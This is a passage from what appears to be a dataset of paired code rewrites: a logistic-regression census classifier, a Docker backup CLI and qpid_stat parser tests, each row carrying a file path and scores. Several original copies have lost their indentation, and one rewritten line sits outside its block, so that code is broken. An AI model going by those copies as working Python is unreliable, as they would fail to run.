        self, tensor_shape, name, layer)
    cluster_params.update(conv_params)
    return cluster_params
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from math import floor, log
import os
output_dir = "output/"
# Process the feature matrix (x)
def dataProcess_X(rawData):
    """Build the normalized numeric feature matrix from the raw census data.

    'sex' has only two values, so it is dropped first and re-inserted as a
    0/1 column (Male=0, Female=1); all remaining categorical columns are
    one-hot encoded, then every column is z-score normalized.

    Args:
        rawData: raw DataFrame; may or may not contain the 'income' label.

    Returns:
        DataFrame of z-score normalized features.
    """
    # Drop the label (when present) and 'sex'; 'sex' is re-added as 0/1 below.
    if "income" in rawData.columns:
        Data = rawData.drop(["sex", 'income'], axis=1)
    else:
        Data = rawData.drop(["sex"], axis=1)
    listObjectColumn = [col for col in Data.columns if Data[col].dtypes == "object"]  # non-numeric columns
    listNonObjedtColumn = [x for x in list(Data) if x not in listObjectColumn]  # numeric columns
    ObjectData = Data[listObjectColumn]
    NonObjectData = Data[listNonObjedtColumn]
    # insert sex into the numeric block with male = 0 and female = 1
    # BUGFIX: np.int was removed in NumPy 1.20+; use the builtin int instead.
    NonObjectData.insert(0, "sex", (rawData["sex"] == " Female").astype(int))
    # set every element in object rows as an attribute (one-hot encoding)
    ObjectData = pd.get_dummies(ObjectData)
    Data = pd.concat([NonObjectData, ObjectData], axis=1)
    Data_x = Data.astype("int64")
    # z-score normalization
    Data_x = (Data_x - Data_x.mean()) / Data_x.std()
    return Data_x
# Process the labels (y)
def dataProcess_Y(rawData):
    """Return a one-column DataFrame: 1 if income is ' >50K', else 0."""
    income_flags = (rawData['income'] == ' >50K').astype("int64")
    return pd.DataFrame(income_flags, columns=["income"])
def sigmoid(z):
    """Logistic function, clipped away from 0 and 1 so log() stays finite."""
    activated = 1.0 / (1.0 + np.exp(-z))
    lower, upper = 1e-8, 1 - 1e-8
    return np.clip(activated, lower, upper)
# Shuffle helper: permutes the dataset (features and labels in unison)
def _shuffle(X, Y):
    """Return X and Y permuted by one shared random order (rows stay paired)."""
    order = np.arange(X.shape[0])
    np.random.shuffle(order)
    return X[order], Y[order]
def split_valid_set(X, Y, percentage):
    """Shuffle the data and split off the first `percentage` as validation.

    Returns (X_train, Y_train, X_valid, Y_valid).
    """
    total = X.shape[0]
    n_valid = int(floor(total * percentage))
    X, Y = _shuffle(X, Y)
    return X[n_valid:], Y[n_valid:], X[:n_valid], Y[:n_valid]
def valid(X, Y, w):
    """Print and return the rounded predictions and accuracy of w on (X, Y)."""
    logits = np.dot(w, X.T)
    preds = np.around(sigmoid(logits))
    hits = (np.squeeze(Y) == preds)
    acc = float(hits.sum()) / hits.shape[0]
    print('Valid acc = %f' % acc)
    return preds, acc
def train(X_train, Y_train):
    """Train a logistic-regression classifier with mini-batch gradient descent.

    Splits off a validation set, runs mini-batch updates for a fixed number of
    epochs while recording train/validation cross-entropy and accuracy, then
    plots both curves.

    Args:
        X_train: feature matrix (bias column already prepended).
        Y_train: column vector of 0/1 labels.

    Returns:
        The learned weight vector w.
    """
    valid_set_percentage = 0.2
    w = np.zeros(len(X_train[0]))
    l_rate = 0.001
    batch_size = 32
    X_train, Y_train, X_valid, Y_valid = split_valid_set(
        X_train, Y_train, valid_set_percentage)
    train_data_size = len(X_train)
    step_num = int(floor(train_data_size / batch_size))
    epoch_num = 300
    list_cost = []
    list_cost_v = []
    accs_train = []
    accs_valid = []
    # Hoisted: the validation labels never change inside the loops.
    labels_v = np.squeeze(Y_valid)
    # BUGFIX: use range(epoch_num) / range(step_num); the original
    # range(1, ...) silently skipped the first batch of every epoch and ran
    # one epoch fewer than configured.
    for epoch in range(epoch_num):
        total_loss = 0.0
        total_loss_v = 0.0
        #X_train, Y_train = _shuffle(X_train, Y_train)
        for idx in range(step_num):
            X = X_train[idx * batch_size:(idx + 1) * batch_size]
            Y = Y_train[idx * batch_size:(idx + 1) * batch_size]
            z = np.dot(X, w)
            y = sigmoid(z)  # logistic activation
            grad = np.sum(-1 * X * (np.squeeze(Y) - y).reshape((batch_size, 1)),
                          axis=0)
            w = w - l_rate * grad
            cross_entropy = -1 * (
                np.dot(np.squeeze(Y.T), np.log(y)) +
                np.dot((1 - np.squeeze(Y.T)), np.log(1 - y))) / len(Y)
            total_loss += cross_entropy
            z_v = np.dot(X_valid, w)
            y_v = sigmoid(z_v)
            # BUGFIX: the validation cross-entropy previously used the
            # predictions y_v as the labels; use the true labels Y_valid.
            total_loss_v += -1 * (
                np.dot(labels_v, np.log(y_v)) +
                np.dot((1 - labels_v), np.log(1 - y_v))) / len(y_v)
        list_cost.append(total_loss)
        list_cost_v.append(total_loss_v)
        result = valid(X_train, Y_train, w)
        result_v = valid(X_valid, Y_valid, w)
        accs_train.append(result[1])
        accs_valid.append(result_v[1])
    drawLoss(list_cost, list_cost_v)
    drawAccs(accs_train, accs_valid)
    return w
def drawLoss(list_cost, list_cost_v):
    """Plot train/validation cross-entropy per epoch and save the figure."""
    plt.figure()
    epochs = np.arange(len(list_cost))
    plt.plot(epochs, list_cost)
    plt.plot(np.arange(len(list_cost_v)), list_cost_v)
    plt.legend(['train', 'dev'])
    plt.title("Train Process")
    plt.xlabel("epoch_num")
    plt.ylabel("Cost Function (Cross Entropy)")
    target = os.path.join(os.path.dirname(output_dir), "TrainProcess")
    plt.savefig(target)
    plt.show()
def drawAccs(accs_train, accs_valid):
    """Plot train/validation accuracy per epoch and save the figure."""
    plt.figure()
    epochs = np.arange(len(accs_train))
    plt.plot(epochs, accs_train)
    plt.plot(np.arange(len(accs_valid)), accs_valid)
    plt.legend(['train', 'dev'])
    plt.title("Train Process")
    plt.xlabel("epoch_num")
    plt.ylabel("Accuracy of Function ")
    target = os.path.join(os.path.dirname(output_dir), "TrainProcess_accuracy")
    plt.savefig(target)
    plt.show()
if __name__ == "__main__":
    trainData = pd.read_csv("data/train.csv")
    testData = pd.read_csv("data/test.csv")
    # here is one more attribute in trainData
    x_train = dataProcess_X(trainData).drop(
        ['native_country_ Holand-Netherlands'], axis=1).values
    x_test = dataProcess_X(testData).values
    y_train = dataProcess_Y(trainData).values
    # prepend a bias column of ones to both splits
    x_test = np.concatenate((np.ones((x_test.shape[0], 1)), x_test), axis=1)
    x_train = np.concatenate((np.ones((x_train.shape[0], 1)), x_train), axis=1)
    # BUGFIX: the output directory must exist before train(), which saves
    # its figures into it; previously it was only created after training.
    if not os.path.exists(output_dir):
        os.mkdir(output_dir)
    w = train(x_train, y_train)
    a = np.dot(w, x_test.T)
    y = sigmoid(a)
    y_ = np.around(y)
    # BUGFIX: size the id column from the prediction count instead of the
    # hard-coded 16281-row test set.
    df = pd.DataFrame({"id": np.arange(1, len(y_) + 1), "label": y_})
df.to_csv(os.path.join(output_dir + 'LR_output.csv'), sep='\t', index=False) | EX3/lr.py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from math import floor, log
import os
output_dir = "output/"
# 处理数据 x
def dataProcess_X(rawData):
#sex 只有两个属性 先drop之后处理
if "income" in rawData.columns:
Data = rawData.drop(["sex", 'income'], axis=1)
else:
Data = rawData.drop(["sex"], axis=1)
listObjectColumn = [col for col in Data.columns if Data[col].dtypes == "object"] #读取非数字的column
listNonObjedtColumn = [x for x in list(Data) if x not in listObjectColumn] #数字的column
ObjectData = Data[listObjectColumn]
NonObjectData = Data[listNonObjedtColumn]
#insert set into nonobject data with male = 0 and female = 1
NonObjectData.insert(0 ,"sex", (rawData["sex"] == " Female").astype(np.int))
#set every element in object rows as an attribute
ObjectData = pd.get_dummies(ObjectData)
Data = pd.concat([NonObjectData, ObjectData], axis=1)
Data_x = Data.astype("int64")
#normalize
Data_x = (Data_x - Data_x.mean()) / Data_x.std()
return Data_x
# 处理数据 y
def dataProcess_Y(rawData):
    """Return a one-column DataFrame: 1 if income is ' >50K', else 0."""
    df_y = rawData['income']
    Data_y = pd.DataFrame((df_y==' >50K').astype("int64"), columns=["income"])
    return Data_y
def sigmoid(z):
    """Logistic function, clipped away from 0/1 so downstream log() is finite."""
    res = 1 / (1.0 + np.exp(-z))
    return np.clip(res, 1e-8, (1-(1e-8)))
#洗牌函数,洗乱数据集
def _shuffle(X, Y):
randomize = np.arange(X.shape[0])
np.random.shuffle(randomize)
return (X[randomize], Y[randomize])
def split_valid_set(X, Y, percentage):
all_size = X.shape[0]
valid_size = int(floor(all_size * percentage))
X, Y = _shuffle(X, Y)
X_valid, Y_valid = X[ : valid_size], Y[ : valid_size]
X_train, Y_train = X[valid_size:], Y[valid_size:]
return X_train, Y_train, X_valid, Y_valid
def valid(X, Y, w):
a = np.dot(w,X.T)
y = sigmoid(a)
y_ = np.around(y)
result = (np.squeeze(Y) == y_)
acc = float(result.sum()) / result.shape[0]
print('Valid acc = %f' % (float(result.sum()) / result.shape[0]))
return y_ , acc
def train(X_train, Y_train):
valid_set_percentage = 0.2
w = np.zeros(len(X_train[0]))
l_rate = 0.001
batch_size = 32
X_train, Y_train, X_valid, Y_valid = split_valid_set(X_train, Y_train, valid_set_percentage)
train_dataz_size = len(X_train)
step_num = int(floor(train_dataz_size / batch_size))
epoch_num = 300
list_cost = []
list_cost_v = []
accs_train = []
accs_valid = []
for epoch in range(1, epoch_num):
total_loss = 0.0
total_loss_v = 0.0
#X_train, Y_train = _shuffle(X_train, Y_train)
for idx in range(1, step_num):
X = X_train[idx*batch_size:(idx+1)*batch_size]
Y = Y_train[idx*batch_size:(idx+1)*batch_size]
z = np.dot(X, w)
y = sigmoid(z) #使用到了激活函数。
grad = np.sum(-1 * X * (np.squeeze(Y) - y).reshape((batch_size, 1)), axis=0)
w = w - l_rate * grad
cross_entropy = -1 * (
np.dot(np.squeeze(Y.T), np.log(y)) + np.dot((1 - np.squeeze(Y.T)), np.log(1 - y))) / len(Y)
total_loss += cross_entropy
z_v = np.dot(X_valid, w)
y_v = sigmoid(z_v)
total_loss_v += -1 * (np.dot(np.squeeze(y_v.T), np.log(y_v)) + np.dot((1 - np.squeeze(y_v.T)),
np.log(1 - y_v))) / len(y_v)
list_cost.append(total_loss)
list_cost_v.append(total_loss_v)
result = valid(X_train, Y_train, w)
result_v = valid(X_valid, Y_valid, w)
accs_train.append(result[1])
accs_valid.append(result_v[1])
drawLoss(list_cost,list_cost_v)
drawAccs(accs_train,accs_valid)
return w
def drawLoss(list_cost,list_cost_v):
plt.figure()
plt.plot(np.arange(len(list_cost)), list_cost)
plt.plot(np.arange(len(list_cost_v)), list_cost_v)
plt.legend(['train','dev'])
plt.title("Train Process")
plt.xlabel("epoch_num")
plt.ylabel("Cost Function (Cross Entropy)")
plt.savefig(os.path.join(os.path.dirname(output_dir), "TrainProcess"))
plt.show()
def drawAccs(accs_train,accs_valid):
plt.figure()
plt.plot(np.arange(len(accs_train)), accs_train)
plt.plot(np.arange(len(accs_valid)), accs_valid)
plt.legend(['train','dev'])
plt.title("Train Process")
plt.xlabel("epoch_num")
plt.ylabel("Accuracy of Function ")
plt.savefig(os.path.join(os.path.dirname(output_dir), "TrainProcess_accuracy"))
plt.show()
if __name__ == "__main__":
trainData = pd.read_csv("data/train.csv")
testData = pd.read_csv("data/test.csv")
# here is one more attribute in trainData
x_train = dataProcess_X(trainData).drop(['native_country_ Holand-Netherlands'], axis=1).values
x_test = dataProcess_X(testData).values
y_train = dataProcess_Y(trainData).values
x_test = np.concatenate((np.ones((x_test.shape[0], 1)), x_test), axis=1)
x_train = np.concatenate((np.ones((x_train.shape[0], 1)),x_train), axis=1)
w = train(x_train, y_train)
a = np.dot(w, x_test.T)
y = sigmoid(a)
y_ = np.around(y)
df = pd.DataFrame({"id": np.arange(1, 16282), "label": y_})
if not os.path.exists(output_dir):
os.mkdir(output_dir)
df.to_csv(os.path.join(output_dir + 'LR_output.csv'), sep='\t', index=False) | 0.326057 | 0.536677 |
import argparse
import re
import dockerbackuputils
from dockerbackuputils import *
#volumeBackup() function takes arguments and options parsed from cli and executes appropriate volume backup
#(i.e. full, only-running or only for provided list)
def volumeBackup(args):
    """Execute the volume backup selected by the parsed cli arguments.

    Resolves the target container list according to the mutually exclusive
    options (--full, --only_running or --container_list) and then runs one
    shared backup step, replacing the previous three copy-pasted branches.
    """
    if args.full:
        cList = getContainerList(getContainerIdList())
        emptyMessage = "\n **** There is no container to backup! **** \n"
    elif args.only_running:
        cList = getRunningContainerList(getContainerIdList())
        emptyMessage = "\n **** There is no running container to backup! **** \n"
    else:
        cList = getContainerList(
            getContainerListFromNames(getContainerNamesFromCLI(args.container_list)))
        emptyMessage = "\n **** There is no container to backup! **** \n"
    if cList:
        dockerVolumeBackup(cList, args.backup_path, args.number_of_copies)
        print("\n **** Backup process of volumes successfully executed! **** \n")
    else:
        print(emptyMessage)
#imageBackup() function takes arguments and options parsed from cli and executes appropriate image backup
#(i.e. full or only for provided list)
def imageBackup(args):
    """Execute the image backup selected by the parsed cli arguments.

    Resolves the target image list (--full or --image_list) and then runs one
    shared backup step, replacing the previous duplicated branches.
    """
    if args.full:
        iList = getImageList()
    else:
        iList = getImageListFromNames(getImageNamesFromCLI(args.image_list))
    if iList:
        dockerImageBackup(iList, args.backup_path, args.number_of_copies)
        print("\n **** Backup process of images successfully executed! **** \n")
    else:
        print("\n **** There is no image to backup! **** \n")
#create cli argument parser using python argparse framework
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--version", action="version", version="1.0.5")  # "--version" option
# BUGFIX: make the subcommand mandatory; previously invoking the tool with no
# subcommand crashed later with AttributeError on args.func.
subparsers = parser.add_subparsers(dest="command", required=True)
volumeParser = subparsers.add_parser("volume")  # subcommand "volume" for container volume backup
volumeParser.add_argument("-b", "--backup_path", help="absolute path to backup folder", required=True)
volumeParser.add_argument("-n", "--number_of_copies", help="number of backup copies to keep", type=int, required=True)
volumeParserGroup = volumeParser.add_mutually_exclusive_group(required=True)  # exactly one selection mode
volumeParserGroup.add_argument("-a", "--full", action="store_true", help="backup all existing containers volumes")
volumeParserGroup.add_argument("-r", "--only_running", action="store_true", help="backup volumes only for running containers")
volumeParserGroup.add_argument("-l", "--container_list", help="comma separated list of container names enclosed in double quotes")
volumeParser.set_defaults(func=volumeBackup)  # dispatch target for "volume"
imageParser = subparsers.add_parser("image")  # subcommand "image" for image backup
imageParser.add_argument("-b", "--backup_path", help="absolute path to backup folder", required=True)
imageParser.add_argument("-n", "--number_of_copies", help="number of backup copies to keep", type=int, required=True)
imageParserGroup = imageParser.add_mutually_exclusive_group(required=True)  # exactly one selection mode
imageParserGroup.add_argument("-a", "--full", action="store_true", help="backup all existing images, excluding dangling")
imageParserGroup.add_argument("-l", "--image_list", help="comma separated list of image names enclosed in double quotes")
imageParser.set_defaults(func=imageBackup)  # dispatch target for "image"
#main function for docker-backup entry point
def mainfunc():
    """Parse the cli arguments and dispatch to the selected subcommand handler."""
    args = parser.parse_args()
    args.func(args)
if __name__ == "__main__":
mainfunc() | apps/docker_backup.py | import argparse
import re
import dockerbackuputils
from dockerbackuputils import *
def volumeBackup(args):
    """Execute a container-volume backup according to the parsed CLI options.

    Args:
        args: argparse.Namespace carrying ``backup_path``, ``number_of_copies``
            and exactly one of ``full`` / ``only_running`` / ``container_list``
            (exclusivity is enforced by the parser's mutually exclusive group).
    """
    # Resolve the target container list for the selected mode; the actual
    # backup + reporting is identical for all three modes, so it is done once
    # below instead of being repeated per branch.
    if args.full:
        containers = getContainerList(getContainerIdList())
        empty_message = "\n **** There is no container to backup! **** \n"
    elif args.only_running:
        containers = getRunningContainerList(getContainerIdList())
        empty_message = "\n **** There is no running container to backup! **** \n"
    else:
        containers = getContainerList(
            getContainerListFromNames(getContainerNamesFromCLI(args.container_list)))
        empty_message = "\n **** There is no container to backup! **** \n"
    if containers:
        dockerVolumeBackup(containers, args.backup_path, args.number_of_copies)
        print("\n **** Backup process of volumes successfully executed! **** \n")
    else:
        print(empty_message)
def imageBackup(args):
    """Execute a docker-image backup according to the parsed CLI options.

    Args:
        args: argparse.Namespace carrying ``backup_path``, ``number_of_copies``
            and exactly one of ``full`` / ``image_list`` (exclusivity is
            enforced by the parser's mutually exclusive group).
    """
    # Resolve the target image list once; backup + reporting is shared by
    # both modes instead of being duplicated per branch.
    if args.full:
        images = getImageList()
    else:
        images = getImageListFromNames(getImageNamesFromCLI(args.image_list))
    if images:
        dockerImageBackup(images, args.backup_path, args.number_of_copies)
        print("\n **** Backup process of images successfully executed! **** \n")
    else:
        print("\n **** There is no image to backup! **** \n")
# Build the CLI argument parser (argparse); each subcommand binds its handler
# function via set_defaults(func=...).
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--version", action="version", version="1.0.5") # print version and exit
subparsers = parser.add_subparsers()
volumeParser = subparsers.add_parser("volume") # subcommand "volume": container volume backup
volumeParser.add_argument("-b", "--backup_path", help="absolute path to backup folder", required=True) # --backup_path option (required)
volumeParser.add_argument("-n", "--number_of_copies", help="number of backup copies to keep", type=int, required=True) # --number_of_copies option (required)
volumeParserGroup = volumeParser.add_mutually_exclusive_group(required=True) # exactly one backup-mode flag must be supplied
volumeParserGroup.add_argument("-a", "--full", action="store_true", help="backup all existing containers volumes") # mode: every container
volumeParserGroup.add_argument("-r", "--only_running", action="store_true", help="backup volumes only for running containers") # mode: running containers only
volumeParserGroup.add_argument("-l", "--container_list", help="comma separated list of container names enclosed in double quotes") # mode: explicit container list
volumeParser.set_defaults(func=volumeBackup) # dispatch target for the "volume" subcommand
imageParser = subparsers.add_parser("image") # subcommand "image": docker image backup
imageParser.add_argument("-b", "--backup_path", help="absolute path to backup folder", required=True) # --backup_path option (required)
imageParser.add_argument("-n", "--number_of_copies", help="number of backup copies to keep", type=int, required=True) # --number_of_copies option (required)
imageParserGroup = imageParser.add_mutually_exclusive_group(required=True) # exactly one backup-mode flag must be supplied
imageParserGroup.add_argument("-a", "--full", action="store_true", help="backup all existing images, excluding dangling") # mode: every (non-dangling) image
imageParserGroup.add_argument("-l", "--image_list", help="comma separated list of image names enclosed in double quotes") # mode: explicit image list
imageParser.set_defaults(func=imageBackup) # dispatch target for the "image" subcommand
# Entry point for the docker-backup console script.
def mainfunc():
    """Parse the command line and hand off to the chosen subcommand's handler."""
    parsed = parser.parse_args()
    parsed.func(parsed)
if __name__ == "__main__":
mainfunc() | 0.252016 | 0.085595 |
from insights.parsers import qpid_stat
from insights.tests import context_wrap
import doctest
QPID_STAT_Q_DOCS = '''
Queues
queue dur autoDel excl msg msgIn msgOut bytes bytesIn bytesOut cons bind
==========================================================================================================================================================
00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 Y Y 0 2 2 0 486 486 1 2
0f7f1a3d-daff-42a6-a994-29050a2eabde:1.0 Y Y 0 8 8 0 4.88k 4.88k 1 2
'''
QPID_STAT_U_DOCS = '''
Subscriptions
subscr queue conn procName procId browse acked excl creditMode delivered sessUnacked
===========================================================================================================================================================================================================================
0 00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 qpid.10.20.1.10:5671-10.20.1.10:33787 celery 21409 CREDIT 2 0
0 pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113 qpid.10.20.1.10:5671-10.30.0.148:57423 goferd 32227 Y CREDIT 0 0
1 server.example.com:event qpid.10.20.1.10:5671-10.20.1.10:33848 Qpid Java Client 21066 Y Y WINDOW 2,623 0
0 celeryev.4c77bd03-1cde-49eb-bdc0-b7c38f9ff93d qpid.10.20.1.10:5671-10.20.1.10:33777 celery 21356 Y CREDIT 363,228 0
1 celery qpid.10.20.1.10:5671-10.20.1.10:33786 celery 21409 Y CREDIT 5 0
'''
def test_qpid_stat_q_docs():
    """Run the qpid_stat module's doctests with pre-built parser objects in scope."""
    env = {
        'qpid_stat_q': qpid_stat.QpidStatQ(context_wrap(QPID_STAT_Q_DOCS)),
        'qpid_stat_u': qpid_stat.QpidStatU(context_wrap(QPID_STAT_U_DOCS)),
    }
    # testmod returns (failure_count, attempted_count); only failures matter here.
    failed, total = doctest.testmod(qpid_stat, globs=env)
    assert failed == 0
QPID_STAT_Q = """
COMMAND> qpid-stat -q --ssl-certificate=/etc/pki/katello/qpid_client_striped.crt -b amqps://localhost:5671
Queues
queue dur autoDel excl msg msgIn msgOut bytes bytesIn bytesOut cons bind
==========================================================================================================================================================
00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 Y Y 0 2 2 0 486 486 1 2
server.example.com:event Y Y 0 2.62k 2.62k 0 45.5m 45.5m 1 2
celery Y 4 41 37 4.12k 37.5k 33.4k 8 2
pulp.agent.836a7366-4790-482d-b3bc-efee9d42b3cd Y 1 1 0 463 463 0 0 1
reserved_resource_worker-7@<EMAIL>.celery.pidbox Y 0 0 0 0 0 0 1 2
reserved_resource_worker-7@<EMAIL>.dq Y Y 0 182 182 0 229k 229k 1 2
""".strip()
def test_qpid_stat_q():
    """Spot-check QpidStatQ parsing of a captured `qpid-stat -q` table."""
    qpid_list = qpid_stat.QpidStatQ(context_wrap(QPID_STAT_Q))
    # Row 0: columns that are blank in the table parse as empty strings.
    assert qpid_list.data[0].get('queue') == '00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0'
    assert qpid_list.data[0].get('dur') == ''
    # Row 1: every column, human-readable sizes ('2.62k', '45.5m') kept verbatim.
    assert qpid_list.data[1].get('queue') == 'server.example.com:event'
    assert qpid_list.data[1].get('dur') == 'Y'
    assert qpid_list.data[1].get('autoDel') == ''
    assert qpid_list.data[1].get('excl') == 'Y'
    assert qpid_list.data[1].get('msg') == '0'
    assert qpid_list.data[1].get('msgIn') == '2.62k'
    assert qpid_list.data[1].get('msgOut') == '2.62k'
    assert qpid_list.data[1].get('bytes') == '0'
    assert qpid_list.data[1].get('bytesIn') == '45.5m'
    assert qpid_list.data[1].get('bytesOut') == '45.5m'
    assert qpid_list.data[1].get('cons') == '1'
    assert qpid_list.data[1].get('bind') == '2'
    # Scattered single-column checks on the middle rows.
    assert qpid_list.data[2].get('msg') == '4'
    assert qpid_list.data[3].get('cons') == '0'
    assert qpid_list.data[4].get('bytesIn') == '0'
    # Last row: full column set again.
    assert qpid_list.data[5].get('queue') == 'reserved_resource_worker-7@<EMAIL>.dq'
    assert qpid_list.data[5].get('dur') == 'Y'
    assert qpid_list.data[5].get('autoDel') == 'Y'
    assert qpid_list.data[5].get('excl') == ''
    assert qpid_list.data[5].get('msg') == '0'
    assert qpid_list.data[5].get('msgIn') == '182'
    assert qpid_list.data[5].get('msgOut') == '182'
    assert qpid_list.data[5].get('bytes') == '0'
    assert qpid_list.data[5].get('bytesIn') == '229k'
    assert qpid_list.data[5].get('bytesOut') == '229k'
    assert qpid_list.data[5].get('cons') == '1'
    assert qpid_list.data[5].get('bind') == '2'
    # test iteration: iterating the parser yields the rows in table order
    assert [d['queue'] for d in qpid_list] == [
        '00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0',
        'server.example.com:event',
        'celery',
        'pulp.agent.836a7366-4790-482d-b3bc-efee9d42b3cd',
        'reserved_resource_worker-7@<EMAIL>.celery.pidbox',
        'reserved_resource_worker-7@server.example.com.dq',
    ]
QPID_STAT_U = """
COMMAND> qpid-stat -u --ssl-certificate=/etc/pki/katello/qpid_client_striped.crt -b amqps://localhost:5671
Subscriptions
subscr queue conn procName procId browse acked excl creditMode delivered sessUnacked
===========================================================================================================================================================================================================================
0 00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 qpid.10.20.1.10:5671-10.20.1.10:33787 celery 21409 CREDIT 2 0
0 pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113 qpid.10.20.1.10:5671-10.30.0.148:57423 goferd 32227 Y CREDIT 0 0
1 server.example.com:event qpid.10.20.1.10:5671-10.20.1.10:33848 Qpid Java Client 21066 Y Y WINDOW 2,623 0
0 celeryev.4c77bd03-1cde-49eb-bdc0-b7c38f9ff93d qpid.10.20.1.10:5671-10.20.1.10:33777 celery 21356 Y CREDIT 363,228 0
1 celery qpid.10.20.1.10:5671-10.20.1.10:33786 celery 21409 Y CREDIT 5 0
katello_event_queue katello_event_queue qpid.10.20.1.10:5671-10.20.1.10:33911 ruby 21801 Y CREDIT 7,642 0
""".strip()
def test_qpid_stat_u():
qpid_list = qpid_stat.QpidStatU(context_wrap(QPID_STAT_U))
assert qpid_list.data[0].get('subscr') == '0'
assert qpid_list.data[0].get('queue') == '00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0'
assert qpid_list.data[0].get('conn') == 'qpid.10.20.1.10:5671-10.20.1.10:33787'
assert qpid_list.data[0].get('procName') == 'celery'
assert qpid_list.data[0].get('procId') == '21409'
assert qpid_list.data[0].get('browse') == ''
assert qpid_list.data[0].get('acked') == ''
assert qpid_list.data[0].get('excl') == ''
assert qpid_list.data[0].get('creditMode') == 'CREDIT'
assert qpid_list.data[0].get('delivered') == '2'
assert qpid_list.data[0].get('sessUnacked') == '0'
assert qpid_list.data[1].get('queue') == 'pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113'
assert qpid_list.data[1].get('conn') == 'qpid.10.20.1.10:5671-10.30.0.148:57423'
assert qpid_list.data[1].get('acked') == 'Y'
assert qpid_list.data[1].get('procName') == 'goferd'
assert qpid_list.data[2].get('subscr') == '1'
assert qpid_list.data[2].get('queue') == 'server.example.com:event'
assert qpid_list.data[2].get('conn') == 'qpid.10.20.1.10:5671-10.20.1.10:33848'
assert qpid_list.data[2].get('procName') == 'Qpid Java Client'
assert qpid_list.data[2].get('procId') == '21066'
assert qpid_list.data[2].get('browse') == ''
assert qpid_list.data[2].get('acked') == 'Y'
assert qpid_list.data[2].get('excl') == 'Y'
assert qpid_list.data[2].get('creditMode') == 'WINDOW'
assert qpid_list.data[2].get('delivered') == '2,623'
assert qpid_list.data[2].get('sessUnacked') == '0'
assert qpid_list.data[3].get('delivered') == '363,228'
assert qpid_list.data[5].get('subscr') == 'katello_event_queue'
# test iteration
assert [d['queue'] for d in qpid_list] == [
'00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0',
'pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113',
'server.example.com:event',
'celeryev.4c77bd03-1cde-49eb-bdc0-b7c38f9ff93d',
'celery',
'katello_event_queue',
] | insights/parsers/tests/test_qpid_stat.py | from insights.parsers import qpid_stat
from insights.tests import context_wrap
import doctest
QPID_STAT_Q_DOCS = '''
Queues
queue dur autoDel excl msg msgIn msgOut bytes bytesIn bytesOut cons bind
==========================================================================================================================================================
00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 Y Y 0 2 2 0 486 486 1 2
0f7f1a3d-daff-42a6-a994-29050a2eabde:1.0 Y Y 0 8 8 0 4.88k 4.88k 1 2
'''
QPID_STAT_U_DOCS = '''
Subscriptions
subscr queue conn procName procId browse acked excl creditMode delivered sessUnacked
===========================================================================================================================================================================================================================
0 00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 qpid.10.20.1.10:5671-10.20.1.10:33787 celery 21409 CREDIT 2 0
0 pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113 qpid.10.20.1.10:5671-10.30.0.148:57423 goferd 32227 Y CREDIT 0 0
1 server.example.com:event qpid.10.20.1.10:5671-10.20.1.10:33848 Qpid Java Client 21066 Y Y WINDOW 2,623 0
0 celeryev.4c77bd03-1cde-49eb-bdc0-b7c38f9ff93d qpid.10.20.1.10:5671-10.20.1.10:33777 celery 21356 Y CREDIT 363,228 0
1 celery qpid.10.20.1.10:5671-10.20.1.10:33786 celery 21409 Y CREDIT 5 0
'''
def test_qpid_stat_q_docs():
    """Execute the qpid_stat doctests, seeding globals with parsed fixtures."""
    doctest_globals = {
        'qpid_stat_q': qpid_stat.QpidStatQ(context_wrap(QPID_STAT_Q_DOCS)),
        'qpid_stat_u': qpid_stat.QpidStatU(context_wrap(QPID_STAT_U_DOCS)),
    }
    failure_count, attempted_count = doctest.testmod(qpid_stat, globs=doctest_globals)
    assert failure_count == 0
QPID_STAT_Q = """
COMMAND> qpid-stat -q --ssl-certificate=/etc/pki/katello/qpid_client_striped.crt -b amqps://localhost:5671
Queues
queue dur autoDel excl msg msgIn msgOut bytes bytesIn bytesOut cons bind
==========================================================================================================================================================
00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 Y Y 0 2 2 0 486 486 1 2
server.example.com:event Y Y 0 2.62k 2.62k 0 45.5m 45.5m 1 2
celery Y 4 41 37 4.12k 37.5k 33.4k 8 2
pulp.agent.836a7366-4790-482d-b3bc-efee9d42b3cd Y 1 1 0 463 463 0 0 1
reserved_resource_worker-7@<EMAIL>.celery.pidbox Y 0 0 0 0 0 0 1 2
reserved_resource_worker-7@<EMAIL>.dq Y Y 0 182 182 0 229k 229k 1 2
""".strip()
def test_qpid_stat_q():
    """Spot-check QpidStatQ parsing of a captured `qpid-stat -q` table."""
    qpid_list = qpid_stat.QpidStatQ(context_wrap(QPID_STAT_Q))
    # Row 0: columns that are blank in the table parse as empty strings.
    assert qpid_list.data[0].get('queue') == '00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0'
    assert qpid_list.data[0].get('dur') == ''
    # Row 1: every column, human-readable sizes ('2.62k', '45.5m') kept verbatim.
    assert qpid_list.data[1].get('queue') == 'server.example.com:event'
    assert qpid_list.data[1].get('dur') == 'Y'
    assert qpid_list.data[1].get('autoDel') == ''
    assert qpid_list.data[1].get('excl') == 'Y'
    assert qpid_list.data[1].get('msg') == '0'
    assert qpid_list.data[1].get('msgIn') == '2.62k'
    assert qpid_list.data[1].get('msgOut') == '2.62k'
    assert qpid_list.data[1].get('bytes') == '0'
    assert qpid_list.data[1].get('bytesIn') == '45.5m'
    assert qpid_list.data[1].get('bytesOut') == '45.5m'
    assert qpid_list.data[1].get('cons') == '1'
    assert qpid_list.data[1].get('bind') == '2'
